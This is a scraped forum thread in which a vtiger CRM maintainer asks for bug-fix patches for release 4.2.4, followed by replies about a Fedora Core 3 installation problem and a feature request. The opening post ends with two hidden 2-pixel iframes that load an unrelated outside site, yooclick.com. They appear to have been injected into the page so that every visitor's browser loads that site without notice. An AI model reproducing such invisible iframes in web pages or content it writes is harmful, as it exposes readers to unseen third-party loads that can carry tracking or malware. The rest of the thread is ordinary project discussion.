Announcement: Calling for fixes to include in 4.2.4

Hi,

I am now looking for the final set of fixes to put into the 4.2.4 release. If you have them, please add a ticket[1] with details on how to reproduce the problem and the code to fix the problem (preferably in unified diff format -- on windows you can make unified diffs with Subversion[2] or WinMerge[3]).

1. <!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/cgi-bin/trac.cgi/newticket">http://vtiger.fosslabs.com/cgi-bin/trac.cgi/newticket</a><!-- m -->
2. <!-- m --><a class="postlink" href="http://subversion.tigris.org/">http://subversion.tigris.org/</a><!-- m -->
3. <!-- m --><a class="postlink" href="http://winmerge.sourceforge.net/">http://winmerge.sourceforge.net/</a><!-- m -->

You can check-out[4] the latest code once you have installed Subversion or browse[5] it on the web.

4. <!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/svn/vtiger/vtigercrm/branches/4.2">http://vtiger.fosslabs.com/svn/vtiger/v ... anches/4.2</a><!-- m -->
5. <!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/cgi-bin/trac.cgi/log/vtigercrm/branches/4.2">http://vtiger.fosslabs.com/cgi-bin/trac ... anches/4.2</a><!-- m -->

If you do not have fixes, then you can help find some. Many bugs have been put into the trunk[6] and need to be split out. When you find something, post message to this forum topic with a link to the changeset that fixes the problem and a description of the problem in a recent svn pull from the 4.2 branch. 4.2.2 was checked in on rev 2002 so anything after that is fair game for checking.

6. <!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/cgi-bin/trac.cgi/log/?rev=2099">http://vtiger.fosslabs.com/cgi-bin/trac ... /?rev=2099</a><!-- m --> <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
«1

Comments

  • 15 Comments sorted by Votes Date Added
  • let's try this again without the typos...

    hi,

    i am now looking for help getting the final set of fixes to put into the 4.2.4 release. if you have them, please add a ticket[1] with details on how to reproduce the problem and the code to fix the problem (preferably in unified diff format -- on windows you can make unified diffs with subversion[2] or winmerge[3]).

    1. <!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/cgi-bin/trac.cgi/newticket">http://vtiger.fosslabs.com/cgi-bin/trac.cgi/newticket</a><!-- m -->
    2. <!-- m --><a class="postlink" href="http://subversion.tigris.org/">http://subversion.tigris.org/</a><!-- m -->
    3. <!-- m --><a class="postlink" href="http://winmerge.sourceforge.net/">http://winmerge.sourceforge.net/</a><!-- m -->

    you can check-out[4] the latest code once you have installed subversion or browse[5] it on the web.

    4. <!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/svn/vtiger/vtigercrm/branches/4.2">http://vtiger.fosslabs.com/svn/vtiger/v ... anches/4.2</a><!-- m -->
    5. <!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/cgi-bin/trac.cgi/log/vtigercrm/branches/4.2">http://vtiger.fosslabs.com/cgi-bin/trac ... anches/4.2</a><!-- m -->

    if you do not have fixes, then you can help find some. many bugs have been fixed in the trunk[6] (the tree that contains vtiger v5) and need to be split out and put into 4.2.x. when you find something, post message to this forum topic with a link to the changeset that fixes the problem and a description of the problem in a recent svn pull from the 4.2 branch. 4.2.2 was checked in on revision 2002 so anything after that is fair game to check for fixes.

    6. <!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/cgi-bin/trac.cgi/log/?rev=2099">http://vtiger.fosslabs.com/cgi-bin/trac ... /?rev=2099</a><!-- m -->
  • is there any plan to fix the installation for fedoracore3 ?
    gd 2.0.28 installation fails, and it is trying to install even though 2.0.33 is already installed.
  • "cp&quot wrote:
    is there any plan to fix the installation for fedoracore3 ?
    gd 2.0.28 installation fails, and it is trying to install even though 2.0.33 is already installed.

    you should download the source and put that in your web space instead of trying to install the binaries on a distribution that already has it's own versions of what is required.

    by the way, what version of mysql and php are in fc3?
  • fathi from vtiger france has generously contributed documentation on how to make patches with subversion and winmerge.

    <!-- m --><a class="postlink" href="http://www.vtiger.com/wiki/index.php/howtogeneratepatchwithwinmerge">http://www.vtiger.com/wiki/index.php/ho ... thwinmerge</a><!-- m -->
  • "cp&quot wrote:
    is there any plan to fix the installation for fedoracore3 ?
    gd 2.0.28 installation fails, and it is trying to install even though 2.0.33 is already installed.

    you should download the source and put that in your web space instead of trying to install the binaries on a distribution that already has it's own versions of what is required.

    by the way, what version of mysql and php are in fc3?

    then why have the bin for the fc distribution?
    there was no mysql installed and the php is 4.3.11-2.8
    the mysql from the bin seemed to have installed ok, no error message was given.
  • "cp&quot wrote:
    "cp&quot wrote:
    is there any plan to fix the installation for fedoracore3 ?
    gd 2.0.28 installation fails, and it is trying to install even though 2.0.33 is already installed.

    you should download the source and put that in your web space instead of trying to install the binaries on a distribution that already has it's own versions of what is required.

    by the way, what version of mysql and php are in fc3?

    then why have the bin for the fc distribution?
    there was no mysql installed and the php is 4.3.11-2.8
    the mysql from the bin seemed to have installed ok, no error message was given.

    there hasn't been a binary release for fc3, only one generic binary installer for linux.

    sorry, but i don't recommend using the binary installer and i don't support it. i suggest you use xampp 1.4.15 or the php, mysql & gd that comes with fc3.
  • mike -

    how are you handling code contributions with 4.2.4? there are some contributions from fredy that i would like to see incorporated into the standard version such as the §visibledescriptions contribution found here:

    <!-- m --><a class="postlink" href="http://forums.vtiger.com/viewtopic.php?t=2364&highlight=">http://forums.vtiger.com/viewtopic.php? ... highlight=</a><!-- m -->
  • 4.2.4 is in the last stages before release so i can't put in any features at this point.

    viewable descriptions are open for discussion in 4.2.5 though. i like the feature, but i'll have to make sure there is a consensus that it should be in that release.

    i don't want to make each release too big. and so far we have plans for some major changes in the translation handling (using gettext instead of a php array). there will be a 4.2.4rc3 in the next few days and then 4.2.4 will release next week.

    mike
  • i can understand that. what would be the mechanism to make such contribution requests for 4.2.5 and track consensus?
Sign In or Register to comment.